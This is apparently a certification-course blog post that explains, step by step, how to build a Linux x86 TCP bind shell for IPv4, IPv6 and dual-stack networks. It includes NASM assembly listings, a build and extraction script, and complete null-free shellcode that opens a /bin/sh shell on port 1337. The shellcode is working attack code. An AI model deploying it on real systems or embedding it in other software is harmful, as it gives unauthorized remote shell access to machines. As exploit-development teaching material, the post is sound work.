TCP IPv4, IPv6, and Dual Stack Linux x86 Bind Shell

By August 19, 2018 August 30th, 2018 SLAE-x86

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1134
Assignment number: 1
Github repo: https://github.com/kkirsche/SLAE
Exploit-DB: Entry 45291


Introduction

Hey everyone! Earlier this year, I finished both the OSCP and the OSWP. Thanks to the challenge, I’ve been excited to try the OSCE certification. Before taking this on though, I wanted to prepare myself, and to do so, I decided to take on the 32-bit SLAE course. As part of this exam, there are seven different assignments that need to be solved, of varying difficulties.

Requirements

  • The shellcode should bind to a specific port and execute a shell when it receives an incoming connection
  • The port number should be easily configurable via a wrapper script or by marking the byte in the code for easy editing

Personally though, I didn’t think this took the idea far enough. It would only give us a working IPv4 bind shell or a working IPv6 bind shell; it wouldn’t provide shellcode we can use in an IPv4 network, in an IPv6 network, or when we don’t know in advance which network protocol we’ll need. As such, I added the following requirements, which ended up exposing a few things I hadn’t fully understood when doing just a single network stack:

  • Create shellcode for IPv4 only networks
  • Create shellcode for IPv6 only networks
  • Create shellcode for hybrid (IPv4 and IPv6) networks

Bind Shells Galore!

C has never been my language of choice. I’ve always found it a bit odd in its style. As a result, I started off my journey trying to build a bind shell using Golang. This kind of worked, but never really was a true bind shell. It never gave an actual shell; it really was just a command executor. Nonetheless, if interested, we’ll go into it below since this was where the process started for me.

(Sort of a) Golang Bind Shell

This code is functional as is, but could use some adjustments if we wanted to actually use this on an engagement. For example, we should turn off / remove the different fmt.Print statements so that we don’t accidentally output something to a user, and so we reduce the size of our binary. Second, we probably would want to provide a way to maintain state rather than executing each command as a single, isolated command. This would take a bit more work, and if you want to stay in Go without dipping into the syscall modules, take a look at “Writing a simple shell in Go”, which does a great job of discussing some of these concepts.

Essentially, what we’re doing here is:

  1. Creating a TCP listener on the port which the bind_port constant is set to
  2. We create an infinite loop so that our shell is reusable and accept any connection that we receive.
  3. We then create a goroutine for the shell to execute in, so that the port is not blocked and the shell can be re-used to create multiple spawned shells
  4. Within the goroutine, we start off by printing a warning that we don’t support interactive commands. This is easy to forget, so it’s meant to be a nice reminder to the user
  5. We then read from the connection until we hit a newline character. This is most commonly indicative of the end of a command within shells.
  6. We prepare the command by removing any leading or trailing carriage returns or newlines from the string, and create an array to determine if we have a command with arguments or no arguments.
  7. We then have our output write to a bytes buffer which we then write back to the connection once the command has completed. Note that this sadly means that we do not stream output, it’s the entire output all at once
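The Go listing itself is not reproduced in this copy of the post. As a rough illustration of steps 5 through 7 only, here is the same read, split, run, and reply-all-at-once logic sketched in Python. The function names parse_command and run_once are made up for this example and are not taken from the original program.

```python
import subprocess


def parse_command(line):
    """Strip leading/trailing CR and LF, then split into program and arguments."""
    text = line.decode("utf-8", errors="replace").strip("\r\n")
    return text.split()


def run_once(line):
    """Run one command and return its complete output as bytes.

    The output is buffered and returned in one piece, so nothing is
    streamed and no state (such as the working directory) survives
    between calls.
    """
    argv = parse_command(line)
    if not argv:
        return b""
    try:
        result = subprocess.run(argv, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
    except OSError as exc:  # for example, the command does not exist
        return (str(exc) + "\n").encode()
    return result.stdout
```

Because every call to run_once starts a fresh process, something like cd has no lasting effect, which is exactly the "command executor, not a shell" limitation described above.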

The restrictions of the above program, such as no streaming output, mean that this honestly isn’t what we want for the exam, but it was a good learning experience. Instead, we turned back to the tried and true C programming language to construct a more appropriate bind shell for our needs.

IPv4 and IPv6 Bind Shell

Since that previous item worked, but didn’t give us the functionality we want, we’re going to instead take a look at doing this in C. Below is each network bind shell type:

Dual Network Stack (IPv4 and IPv6) Bind Shell

IPv4 Bind Shell

IPv6 Bind Shell

So let’s break down what we’re doing here. We’ll specifically be discussing the dual network stack bind shell, but the concepts outlined apply roughly to what’s occurring in the other two.

Lines 1–6 are just the includes for the different functions we need. We’re not going to discuss these as they’re pretty straightforward.

On lines eight and nine, we define the two variables that we’ll be using throughout our bind shell. First, we define the sockfd variable as an integer, which will hold the socket file descriptor that we get back from the socket call. Second, we have the recvConn variable which is the reference to the active connection once we accept it. This is also an integer.

On line 11, we have a constant integer, NO, which we’ll be using later to set a socket option stating that the socket we made is not an IPv6 only socket. This is the key to how our bind shell will be able to work on both IPv6 and IPv4.

With our variables out of the way, we get to the meat of the bind shell. We start off on line 18 with a call to socket to create the socket, and we give it three arguments: first, the domain we want this socket to be in (e.g. IPv4 or IPv6); second, the communication type, which states how we’ll communicate using the socket; and lastly, the protocol that we’ll be communicating in on this socket. In our case, we are creating an IPv6 socket using AF_INET6, which will be used for bi-directional communication as noted by SOCK_STREAM, using the IP protocol per the 0. A protocol of 0 lets the kernel pick the default for the socket type, which for SOCK_STREAM is TCP.

The protocol here is interesting as you’ll sometimes see people use either the IPv6 protocol or the IPv4 protocol directly, but because we’re going to be using both IPv4 and IPv6, we need to be more generic by simply saying we’ll use the IP protocol.

With our socket created, we then explicitly clear the IPv6-only option. If it were enabled, the socket would only accept IPv6 traffic, which would prevent us from serving the same port on both IPv4 and IPv6 addresses. To set this option, we provide five arguments: the socket file descriptor to set the option on, the level at which the option lives (the socket itself or a specific protocol), the option which is being set, a pointer to the option value, and lastly the size of the option value.

In our case, we pass the socket file descriptor from the socket call, provide the IPPROTO_IPV6 level, and set IPV6_V6ONLY to a value of 0, which is the value of no or false. If we wanted to make the socket IPv6 only, we would instead change this to a 1.
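The C listing is not reproduced in this copy of the post, so here is a minimal Python sketch of just these two calls, using the standard socket module. The function name open_dual_stack_socket is hypothetical, and the sketch assumes a host where IPv6 sockets are available.

```python
import socket


def open_dual_stack_socket():
    """Create an AF_INET6 TCP socket with the IPv6-only option switched off."""
    sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, 0)
    # 0 means "not IPv6 only"; IPv4 peers then show up as ::ffff:a.b.c.d
    sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
    return sock
```

Reading the option back with sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY) is a quick way to confirm that the setting took effect.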

With our options set, on lines 24–32 we build the listening host structures. The variable names, v4lhost and v6lhost, are based on the variable Metasploit uses for listening hosts, LHOST. In our case, we provide the IP family (IPv4 or IPv6), the port which we’ll bind to, and then the address to bind to (which in our case is ANY / ALL addresses that the machine has for this address family).

Lines 31 and 32 are deceptively simple though, as by using variables it hides the size of the address that we’re actually working with. Remember that an IPv6 address is 128 bits, while an IPv4 address is 32 bits. This will be very important when we convert this into assembly language.
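To make the size difference concrete, here is a small Python sketch that lays out both structures byte by byte with the struct module. The field order follows the Linux struct sockaddr_in and struct sockaddr_in6 definitions; the helper names and the hard-coded Linux constants are assumptions made for this example.

```python
import struct

AF_INET, AF_INET6 = 2, 10   # Linux values, hard-coded for illustration
PORT = 1337


def sockaddr_in(port):
    # sin_family (host order), sin_port (network order), sin_addr, sin_zero
    return (struct.pack("<H", AF_INET) + struct.pack(">H", port)
            + bytes(4) + bytes(8))


def sockaddr_in6(port):
    # sin6_family, sin6_port, sin6_flowinfo, sin6_addr, sin6_scope_id
    return (struct.pack("<H", AF_INET6) + struct.pack(">H", port)
            + bytes(4) + bytes(16) + bytes(4))


print(len(sockaddr_in(PORT)), len(sockaddr_in6(PORT)))  # 16 28
```

Those two lengths are the 0x10 and 0x1c values that show up as the size argument to bind in the assembly later on.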

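Once we have our structures built, we bind our socket to the IPv4 and IPv6 addresses on the host. Notice that we call bind twice, once for IPv4 and once for IPv6. Strictly speaking, on Linux a single bind to the IPv6 wildcard address is already enough once IPV6_V6ONLY is disabled, because IPv4 clients are then accepted as IPv4-mapped IPv6 addresses, so the explicit IPv4 bind is not strictly required.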

Once we bind the port, we begin listening and then accept a connection which comes in on the port we’re listening to.

Once we receive the connection on our socket, we run dup2. This looks a little weird until you understand what it is doing. In this case, we’re telling the system that file descriptors 0, 1, and 2 (stdin, stdout, and stderr) should be directed through the connection we received.

Lastly, with the connection received and our inputs and outputs redirected, we use execve to begin a shell using /bin/sh for maximum portability. When the shell is done, we clean up by closing the connection on our side and returning 0 to say that our shell completed successfully.

Moving From C to Assembly

With our three different bind shells in place, it’s time to convert this over to x86 assembly language. This requires us to make a few changes because of how socket operations actually occur at the assembly level. Instead of calling socket, setsockopt, or other socket functions, we actually need to use the socketcall system call, a generic entry point through which the different socket operations are triggered. It’s discussed in more detail on its man page.

Technically, all of the following is written for the Netwide Assembler (NASM) in Intel syntax. Other assemblers you might encounter include the GNU Assembler (GAS), Motorola 680x0 assemblers (asm68k), the Microsoft Macro Assembler (MASM), and Turbo Assembler (TASM).

x86 ASM Dual Network Stack (IPv4 and IPv6) Bind Shell

x86 ASM IPv4 Bind Shell

x86 ASM IPv6 Bind Shell

Similar to the C code above, we’ll only explain what’s happening in the dual network stack assembly code. This was written specifically to be null free and not to rely on any predefined conditions such as empty registers. This allows us to use the shellcode we produce from this assembly in any application safely, as we ensure that it will work regardless of pre-existing conditions.

Let’s get started. So we start off by doing the basic assembly language structure by creating our start point as a global and then defining it within the text section. Nothing special here.

The first major section we get to is the socket call, which is represented by the following block of code.


; socket
;; cleanup
xor ebx, ebx
;; arguments
push ebx ; #define IPPROTO_IP 0
push 0x1 ; #define SOCK_STREAM 1
push 0xa ; #define PF_INET6 10
;; function
mov ecx, esp ; pointer to args on the stack into ecx
push 0x66
pop eax ; socketcall 0x66 == 102
inc ebx ; #define SYS_SOCKET 1
;; call
int 0x80
;; returned data
xchg esi, eax ; sockfd eax -> esi

First thing we do is a bit of cleanup. We need a zero for the protocol argument, IPPROTO_IP (because we want to use either the IPv4 or IPv6 protocol, both members of the more generic Internet Protocol family). To get this, we first xor ebx with itself. Anything that is xor’d with itself results in zero, thus giving us the null we need.

Because socketcall takes a pointer to an array of arguments and the stack grows downward, we need to push our arguments in reverse order: the last argument first, then the second to last, and so on. In this way, we push a zero for IPPROTO_IP, a one for the SOCK_STREAM value, and lastly 0xa (10 decimal) representing PF_INET6. You may notice that in the C code we used AF_INET6. This is for historical reasons (on Linux the two constants have the same value), but essentially PF_INET values should be used in socket calls, while AF_INET values should be used in structs. More on this in this StackOverflow answer.

Once we have our function arguments, we need to set up the actual function call. We do this by moving a pointer to our arguments (which are on the stack, so ESP points at them) into ECX. We then use a push 0x66 / pop eax technique to place the value 0x66 (102 decimal) into EAX. This tells the system that we’d like to use the socketcall system call. The value of this method is that we save a byte over first xor’ing the EAX register and then moving 0x66 into AL (the lowest byte of EAX). We need to do this the first time because EAX could hold anything before our code runs. Lastly, we increment EBX, which was zeroed during the cleanup step, so that we have a 1 in the register. This specifies which socket operation we want to perform. In this case, we’re performing the SYS_SOCKET operation, which is what the socket function in C calls under the hood.
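The effect of pushing in reverse order is easy to check with a toy model of the stack. The sketch below is plain Python, not real syscall code; push_dwords is a made-up helper that returns the bytes as they would sit in memory starting at ESP.

```python
import struct

SYS_SOCKETCALL = 0x66   # goes into EAX
SYS_SOCKET = 1          # goes into EBX


def push_dwords(values):
    """Emulate a series of 32-bit pushes and return memory starting at ESP."""
    memory = b""
    for value in values:
        # each push lands at a lower address, in front of the earlier data
        memory = struct.pack("<I", value) + memory
    return memory


# pushed in reverse: protocol (0), type (SOCK_STREAM), domain (PF_INET6)
args = push_dwords([0, 1, 10])
print(struct.unpack("<3I", args))  # (10, 1, 0)
```

Read from ESP upward, the array is domain, type, protocol, which is the argument order socket(10, 1, 0) expects when ECX points at it.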

Now that we have our function set up and our arguments on the stack, we execute interrupt 0x80 to make the call. This places our return value, the socket file descriptor, into EAX. After the call, we exchange the values of EAX and ESI with xchg. By doing this, we’re putting our socket file descriptor into ESI, which is not commonly used by the functions we’ll be working with.

With our socket created, and our socket file descriptor safe, we now need to make sure that the system is set to allow this socket for both IPv4 and IPv6. While it’s common for systems to allow this, we don’t want to risk encountering a system which restricts this. Thus, we explicitly set this.


; setsockopt
;; cleanup
xor eax, eax
;; arguments
push eax ; NO = 0x0
mov edx, esp ; get a pointer to the null value
push 0x2 ; option length as pushed (sizeof(int) would be 0x4)
push edx ; pointer to NO
push 0x1a ; #define IPV6_V6ONLY 26
push 0x29 ; #define IPPROTO_IPV6 41
;; function
mov ecx, esp ; pointer to args on the stack into ecx
mov al, 0x66 ; socketcall 0x66 == 102
mov bl, 0xe ; #define SYS_SETSOCKOPT 14
;; call
int 0x80

Similar to what we did during the socket call, we start off by setting things up. Since we exchanged the values of ESI and EAX, we don’t know what ESI had before our code, which is now in EAX. Thus, we need to clear the EAX register as it might be full after our exchange.

Since we want to set a value of 0, which tells the system that this is not an IPv6 only socket, we then push the now zero’d out register EAX onto the stack. We’re going to need the memory address of this value, so we move the memory address of the 0 into EDX. This is just a temporary storage action.

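With the pointer saved, we then push our arguments onto the stack in reverse order. First, the value 2 as the option length, then the pointer to the 0 value (the NO variable from our C code) using the EDX register, 0x1a (26 decimal) to specify which option we’re setting, and lastly 0x29 (41 decimal) to specify the level we’re working with. Two caveats apply to this listing as written: an int is 4 bytes on 32-bit Linux, so 0x4 is the length that matches sizeof(NO), and setsockopt expects the socket file descriptor as its first argument, so a push esi after the level is needed to complete the argument list. Without those the call is likely to fail, and the socket simply keeps the system default for IPV6_V6ONLY.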

As we did before, we have our arguments on the stack, so we can now prepare the registers for our actual function call. We do this in lowest register to highest register order, moving a pointer to our function arguments into ECX, 0x66 (socketcall syscall) into al, and 0xe (14 decimal) into bl. This 0xe tells the socketcall syscall that we’re going to perform a setsockopt socket call type.

We’re using mov here as opposed to the push / pop technique we used before because at this point we know what the values are and we’ve controlled them. We zero’d out EAX at the beginning of the section, so we can safely set the value via mov, and we know that EBX after our first socket call is not large enough to worry about a mov.

With our function and arguments in place, we repeat the int 0x80 to trigger the function call. Since we expect this will be used remotely without our ability to see what’s happening, we aren’t going to handle any of the error values.

Now that the system knows we can use this socket on both IPv4 and IPv6, we then begin the process of binding to the system’s IPv4 and IPv6 addresses. To keep our code clean, we first bind to IPv4 like so:


; bind ipv4
;; cleanup
xor edx, edx
;; v4lhost struct
push edx ; #define INADDR_ANY 0
push word 0x3905 ; port 1337 in big endian format
push 0x2 ; #define AF_INET 2
;; arguments
mov ecx, esp ; pointer to v4lhost struct arguments
push 0x10 ; sizeof v4lhost
push ecx ; pointer v4lhost
push esi ; push sockfd onto stack
;; function
mov ecx, esp ; argument pointer into ecx
mov bl, 0x2 ; #define SYS_BIND 2
mov al, 0x66 ; socketcall 0x66 == 102
;; call
int 0x80

In this situation we follow the same mantra as before: cleanup, arguments, function, call. This keeps the code organized and more consistent to read. We start off by clearing the EDX register using xor. I’ve seen people use the cdq instruction to clear EDX instead, but I decided against it: cdq copies the sign bit of EAX into every bit of EDX, so it only yields zero when EAX is non-negative. If EAX holds a negative error code from a failed socket creation or other issue, EDX ends up as 0xffffffff.
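As a quick illustration of why cdq is only a safe way to zero EDX when EAX is known to be non-negative, here is a tiny Python model of the instruction. The function is a sketch written for this post and not part of any library.

```python
def cdq(eax):
    """Return the EDX value that cdq produces for a given 32-bit EAX."""
    # cdq sign-extends EAX into EDX:EAX, so EDX is all ones or all zeros
    return 0xFFFFFFFF if eax & 0x80000000 else 0x00000000


print(hex(cdq(3)))           # 0x0         (EAX holds a valid descriptor)
print(hex(cdq(0xFFFFFFEA)))  # 0xffffffff  (EAX holds -22, an error code)
```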

With our empty EDX register, we then push our arguments onto the stack, again in reverse order. We first push the 0 from EDX, which is the normal value of the constant INADDR_ANY, meaning any IPv4 address on the host. We then push our port number. This is unique as we push this in big-endian format, which is the network byte order. If you aren’t familiar with network byte order, it’s discussed on Wikipedia here.
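The relationship between port 1337 and the immediate 0x3905 can be checked in a couple of lines of Python. The helper name push_word_immediate is made up for this sketch.

```python
import struct


def push_word_immediate(port):
    """Return the 16-bit value to use with `push word` for a given port."""
    wire = struct.pack("!H", port)          # network byte order (big endian)
    # x86 stores the immediate low byte first, so swap to get the operand
    return int.from_bytes(wire, "little")


print(struct.pack("!H", 1337).hex())   # 0539
print(hex(push_word_immediate(1337)))  # 0x3905
```

In other words, writing 0x3905 in the source makes the bytes 0x05 0x39 land in memory in that order, which is 1337 as the network sees it.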

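Lastly, since this is the IPv4 structure, we push 0x2 (2 decimal) to state that this is the IPv4 address family (AF_INET). Note that a plain push 0x2 stores four bytes, while sin_family is a two-byte field; the IPv6 block below uses push word for the same purpose, and doing the same here would lay the structure out exactly as struct sockaddr_in expects.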

With our listening host structure in place, we can setup the function arguments. We first store a pointer to the listening host structure in ECX, we then push 0x10 (16 decimal) onto the stack to define the size of the structure in ECX, we then push the pointer to the structure onto the stack (since we call from socketcall, our arguments go on the stack), and lastly we push our socket file descriptor which we stored in ESI earlier onto the stack.

Once we have our arguments on the stack, we can then set up our function call. Socketcall, as we saw before, expects a pointer to our arguments in ECX and the socketcall type in EBX (0x2, SYS_BIND), and we put 0x66 (102 decimal) into EAX so that we use the generic socketcall system call (syscall for short). With our function and its arguments in place, we then trigger the function using int 0x80.

With our IPv4 address bound, we then need to also bind the IPv6 address. This is a little interesting compared to what we had to do with the IPv4 address space. Unlike before, where a single null dword was enough to mean any IPv4 address, IPv6’s expanded address size (128-bit vs. 32-bit) means we need to expand the zero value into multiple double words.


; bind ipv6
;; cleanup
xor eax, eax
;; v6lhost struct
push dword eax ; v6_host.sin6_addr
push dword eax
push dword eax
push dword eax
push dword eax ; v6_host.sin6_flowinfo
push word 0x3905 ; port 1337
push word 0x0a ; AF_INET6 (10)
;; arguments
mov ecx, esp ; pointer to struct into ecx
push 0x1c ; sizeof struct
push ecx ; pointer to struct
push esi ; sockfd
;; function
mov ecx, esp ; arguments into register
mov bl, 0x2 ; #define SYS_BIND 2
mov al, 0x66 ; socketcall 0x66 == 102
;; call
int 0x80

First of course, we need a null value. We create this by xor’ing EAX with itself. With a null register ready, we push it onto the stack five times: four dwords for the 128-bit sin6_addr and one for sin6_flowinfo. An all-zero address tells the system that we’re going to use any IPv6 address on the host, not just a single IP. Once we have our IP address on the stack, we then push our port number again. This should be the exact same port that we used before. We should NOT use a different port, because we’ve set up the socket to serve both IPv4 and IPv6 on one port. If you were going to use different ports, the setsockopt call would not be necessary. Lastly, we specify the address family (AF) as IPv6, this time with push word so that it fills exactly the two-byte sin6_family field.

This finishes our structure and allows us to now focus on the function arguments. Similar to what we did with the IPv4 bind call, we put a pointer to our structure in the ECX register. We then push the size of our structure (0x1c hex or 28 decimal) onto the stack, then a pointer to our structure (stored in ECX, so we use push ecx), and then our socket file descriptor from ESI.
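To see what those pushes leave in memory, the sketch below replays them in Python with a toy stack model. The push helper is invented for this example; sizes are in bytes.

```python
import struct


def push(memory, value, size):
    """Emulate a push of `size` bytes (2 or 4); lower addresses come first."""
    fmt = "<H" if size == 2 else "<I"
    return struct.pack(fmt, value) + memory


mem = b""
for _ in range(5):            # four dwords of sin6_addr, one of sin6_flowinfo
    mem = push(mem, 0, 4)
mem = push(mem, 0x3905, 2)    # port 1337, stored as bytes 05 39
mem = push(mem, 0x0a, 2)      # address family, AF_INET6

print(len(mem))               # 24
print(mem[:4].hex())          # 0a000539
```

The pushes account for 24 bytes, while the length passed to bind is 0x1c (28). The remaining four bytes, sin6_scope_id, are therefore read from whatever already sits above the structure on the stack.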

Now that our arguments are on the stack, we move a pointer to our arguments into ECX, move 0x2 into EBX to state that we want to do a bind socket call, and then put 0x66 into EAX to select socketcall. With our function set up, we then trigger it using int 0x80.

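We’ve now bound our IPv4 and IPv6 addresses explicitly. Before we can accept anything, the socket has to be switched into listening mode. That step is not broken out as its own listing here, but it is visible in the shellcode dump further down as push 0x2, push esi, mov ecx, esp, mov bl, 0x4 (SYS_LISTEN), mov al, 0x66, int 0x80, which is listen(sockfd, 2). After that we can accept any connections which we receive. We do this with the following block of assembly: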


; accept
;; cleanup
xor ebx, ebx
;; arguments
push ebx ; push NULL
push ebx ; push NULL
push esi ; sockfd
;; function
mov ecx, esp ; pointer to args into ecx
mov bl, 0x5 ; #define SYS_ACCEPT 5
mov al, 0x66 ; socketcall 0x66 == 102
;; call
int 0x80
;; returned data
xchg ebx, eax ; ebx holds the new sockfd that we accepted

This is where we accept our connections. We first set up our function by clearing the EBX register by xor’ing it with itself. The accept socket call takes three arguments, int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen), and since we don’t care who connects we want NULLs for addr and addrlen. As such, we push the value of EBX twice, representing those two NULL values. Finally we push ESI, which holds our socket file descriptor; it is the first argument, so it is pushed last.

With our arguments in place, we then set up the function: we move a pointer to the arguments into ECX, set the socketcall type in EBX to SYS_ACCEPT (which is what the C accept function uses), and put the socketcall number, 0x66, into EAX.

With everything setup, we then trigger the accept function with int 0x80.

We need the client socket file descriptor that the accept command returns though, so we move the return value from EAX to EBX using the xchg command.

Now that we have a connection, we have to connect stdin, stdout, and stderr to the connection we received. We can do this using the dup2 system call.


; dup file descriptor
;; setup counters
sub ecx, ecx ; zero out ecx
mov cl, 0x2 ; create a counter
;; loop
duploop:
mov al, 0x3f ; SYS_DUP2 syscall
int 0x80 ; call SYS_DUP2
dec ecx ; decrement loop counter
jns duploop ; as long as SF is not set, keep looping

We start off by clearing the ECX register. We could use xor, but we instead use sub to reduce the chance that we’ll be detected by IDS / IPS. Once we have a zeroed out register, we then move the starting value of our loop counter (2, the highest file descriptor we want to replace) into CL, the lowest byte of ECX.

We then define a label for our loop, duploop, since we’re looping the duplication call. dup2 takes the old file descriptor in EBX, which already holds the client socket from the xchg after accept, and the new file descriptor in ECX, which doubles as our counter. Inside the loop we move the system call number into AL, the lowest byte of EAX, trigger the call with int 0x80, then decrement the counter and check the sign flag to see whether we’re done. This repeats three times (2, 1, 0); when the decrement takes ECX to -1 the sign flag is set and the loop ends.
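The same countdown can be written in a few lines of Python. This is a sketch of the loop logic only; redirect_stdio is a hypothetical helper, and the dup2 parameter exists so the loop can be exercised without touching the real standard streams.

```python
import os


def redirect_stdio(conn_fd, dup2=os.dup2):
    """Point stderr, stdout and stdin (2, 1, 0) at conn_fd, like duploop."""
    counter = 2                  # mov cl, 0x2
    while counter >= 0:          # jns duploop: stop once dec goes negative
        dup2(conn_fd, counter)   # dup2(old fd in EBX, new fd in ECX)
        counter -= 1             # dec ecx
```

Calling redirect_stdio(conn.fileno()) on an accepted connection and then os.execve on a shell would mirror the last two blocks of the assembly.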

We have the inputs and outputs connected now, but we don’t have any programs running yet for these to connect to. As such, we need to finish things up by triggering our execve to trigger our shell which the inputs and outputs will be connected to.


; execve
;; cleanup
xor edx, edx
;; command to run
push edx ; NULL string terminator
push 0x68732f2f ; hs//
push 0x6e69622f ; nib/
;; arguments
mov ebx, esp ; pointer to "/bin//sh" into ebx
push edx ; NULL terminator for argv
push ebx ; argv[0] = pointer to "/bin//sh"
;; function
mov ecx, esp
mov al, 0x0b ; execve systemcall
int 0x80

We start off by emptying EDX, and pushing this onto the stack. This is the null terminator that C programs use to represent the end of a string. We then push /bin/sh (actually /bin//sh, so that the string is exactly eight bytes and fits into two dword pushes without any padding nulls) onto the stack as the program we want to execute.
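The two immediates can be derived mechanically from the path. The following Python sketch does that for any path whose length is a multiple of four; push_string_dwords is a name invented for this example.

```python
import struct


def push_string_dwords(path):
    """Return the 32-bit immediates to push, last four bytes first."""
    if len(path) % 4:
        raise ValueError("pad the path to a multiple of 4 bytes, e.g. /bin//sh")
    chunks = [path[i:i + 4] for i in range(0, len(path), 4)]
    # the tail of the string is pushed first so the head ends up at ESP
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]


print([hex(v) for v in push_string_dwords(b"/bin//sh")])
# ['0x68732f2f', '0x6e69622f']
```

The doubled slash is harmless to the kernel's path lookup, which is why it is a convenient way to reach eight bytes.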

With this in place, we move a pointer to our target program into EBX (the string sits at the top of the stack, so we copy ESP into EBX). We then push a NULL to terminate the argv array, followed by the pointer to our string as argv[0]. Now we have our function arguments on the stack.

We move the pointer to the argv array into ECX; EDX, still zero, serves as a NULL envp. Then we set the execve system call number (0x0b, 11 decimal) in AL and trigger it with int 0x80. This executes the shell, giving us a working bind shell.

Testing and Extracting Our Shellcode

So we now have a working application which binds on both our IPv4 and IPv6 addresses on port 1337. We need a way to test this though. The following script assembles and links the code, assuming that our assembly is stored in dual_stack_bind_shell.nasm, and then extracts the shellcode:


#!/bin/bash
binary=dual_stack_bind_shell
echo '[+] Assembling with Nasm ... '
nasm -f elf32 -o "${binary}.o" "${binary}.nasm"
echo '[+] Linking ...'
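# -fno-stack-protector is a GCC option rather than an ld option, so it is dropped here.
# On a 64-bit host, add -m elf_i386 to the ld invocation.
ld -o "${binary}" "${binary}.o" -z execstack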
echo '[+] Dumping shellcode ...'
objdump -d "./${binary}"|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
echo '[+] Removing object file'
rm -f "${binary}.o"
echo '[+] Done!'

With this, we have a working bind shell on both IPv4 and IPv6:

Nice! It works. With this, it outputs our shellcode:

"\x31\xdb\x53\x6a\x01\x6a\x0a\x89\xe1\x6a\x66\x58\x43\xcd\x80\x96\x31\xc0\x50\x89\xe2\x6a\x02\x52\x6a\x1a\x6a\x29\x89\xe1\xb0\x66\xb3\x0e\xcd\x80\x31\xd2\x52\x66\x68\x05\x39\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x50\x50\x50\x50\x66\x68\x05\x39\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\xb3\x02\xb0\x66\xcd\x80\x6a\x02\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x93\x29\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"

Obviously, it’s hard to test this on its own, so I wrote a little C program to pollute some of the registers and then call this. Warning though, this is a REALLY big file, because this is also what was submitted to Exploit-DB, so I wanted it to stand fully on its own with as much information as possible.

Moving from fixed port number to a dynamic port value

W00t! This works! Now though, we have one last requirement for the SLAE exam, and that’s a wrapper script to change the port number. Personally, I would argue this isn’t something that we should be doing at the assembly level, but I understand why we are doing so.

As such, we’ll do it with Python.

Changing the port

Now that we have shellcode ready, we need to make sure we can change the port easily. We’ll do that with Python using the following script:

This will allow us to generate shellcode which will work with the port of our choice. Interestingly, even though the assembly uses the immediate 0x3905, the objdump output shows the bytes as \x05\x39. That is expected: x86 stores the immediate least significant byte first, so the bytes that land in memory are 0x05 0x39, which is 1337 (0x0539) in network byte order. The Python script emits the port bytes in that same order. To change this, we can reverse the order of our format arguments, but at this time I don’t feel it’s necessary as testing on Ubuntu 18.04 32-bit worked perfectly with this shellcode.
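The wrapper script itself is not reproduced in this copy of the post. As a minimal sketch of the idea, assuming we simply patch the two push word immediates that carry the port, something like the following would work. The names TEMPLATE, with_port, and as_c_string are invented here, and the bytes are copied from the objdump output above.

```python
import struct

# Shellcode from the objdump output above, split by step for readability.
TEMPLATE = (
    b"\x31\xdb\x53\x6a\x01\x6a\x0a\x89\xe1\x6a\x66\x58\x43\xcd\x80\x96"
    b"\x31\xc0\x50\x89\xe2\x6a\x02\x52\x6a\x1a\x6a\x29\x89\xe1\xb0\x66"
    b"\xb3\x0e\xcd\x80"
    b"\x31\xd2\x52\x66\x68\x05\x39\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89"
    b"\xe1\xb3\x02\xb0\x66\xcd\x80"
    b"\x31\xc0\x50\x50\x50\x50\x50\x66\x68\x05\x39\x66\x6a\x0a\x89\xe1"
    b"\x6a\x1c\x51\x56\x89\xe1\xb3\x02\xb0\x66\xcd\x80"
    b"\x6a\x02\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80"
    b"\x31\xdb\x53\x53\x56\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x93"
    b"\x29\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9"
    b"\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
    b"\x53\x89\xe1\xb0\x0b\xcd\x80"
)
PUSH_WORD = b"\x66\x68"                      # opcode bytes of `push word imm16`
DEFAULT_PORT = struct.pack("!H", 1337)       # b"\x05\x39"


def with_port(port, template=TEMPLATE):
    """Return the shellcode with both port immediates replaced."""
    if not 0 < port < 65536:
        raise ValueError("port must be between 1 and 65535")
    new_port = struct.pack("!H", port)       # network byte order
    if b"\x00" in new_port:
        raise ValueError("this port would introduce a null byte")
    marker = PUSH_WORD + DEFAULT_PORT
    if template.count(marker) != 2:
        raise ValueError("expected the port to appear exactly twice")
    return template.replace(marker, PUSH_WORD + new_port)


def as_c_string(code):
    """Format bytes as a C string literal such as "\\x31\\xdb..."."""
    return '"' + "".join("\\x%02x" % byte for byte in code) + '"'
```

For example, print(as_c_string(with_port(4444))) prints the patched shellcode ready to paste into a C test harness. Ports such as 256 or 1024 are rejected because one of their two bytes is zero.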

Conclusion

At this point, we have usable shellcode, which is register independent (no matter what was there before, this will work), and assuming a port number that is null free, the shellcode will also be null free.

Author Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.
